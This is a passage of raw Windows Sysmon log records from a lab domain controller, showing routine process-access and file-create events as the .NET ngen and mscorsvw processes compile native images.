EL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:59.148{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9243-6005-3304-00000000A301}2516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:59.148{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9243-6005-3304-00000000A301}2516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:59.086{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9243-6005-3204-00000000A301}1684C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:59.070{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9243-6005-3204-00000000A301}1684C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:59.070{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9243-6005-3204-00000000A301}1684C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:59.008{59A5CD1D-9242-6005-3104-00000000A301}4204C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\106c-0\System.Device.dll2021-01-18 13:50:59.008 10341000x80000000000000008518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:00.992{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9244-6005-3B04-00000000A301}1404C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:00.992{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9244-6005-3B04-00000000A301}1404C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:00.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9244-6005-3A04-00000000A301}1004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:00.648{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9244-6005-3A04-00000000A301}1004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:00.648{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9244-6005-3A04-00000000A301}1004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:00.586{59A5CD1D-9244-6005-3904-00000000A301}5008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1390-0\System.Dynamic.dll2021-01-18 13:51:00.586 10341000x80000000000000008512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:00.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9244-6005-3904-00000000A301}5008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:00.382{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9244-6005-3904-00000000A301}5008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:00.382{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9244-6005-3904-00000000A301}5008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:00.320{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9244-6005-3804-00000000A301}2232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:00.304{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9244-6005-3804-00000000A301}2232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:00.304{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9244-6005-3804-00000000A301}2232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:00.242{59A5CD1D-9244-6005-3704-00000000A301}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\fec-0\System.Drawing.Design.dll2021-01-18 13:51:00.242 10341000x80000000000000008505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:00.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9244-6005-3704-00000000A301}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:00.101{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9244-6005-3704-00000000A301}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:00.101{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9244-6005-3704-00000000A301}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:00.054{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9244-6005-3604-00000000A301}3664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:00.039{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9244-6005-3604-00000000A301}3664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:00.039{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9244-6005-3604-00000000A301}3664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
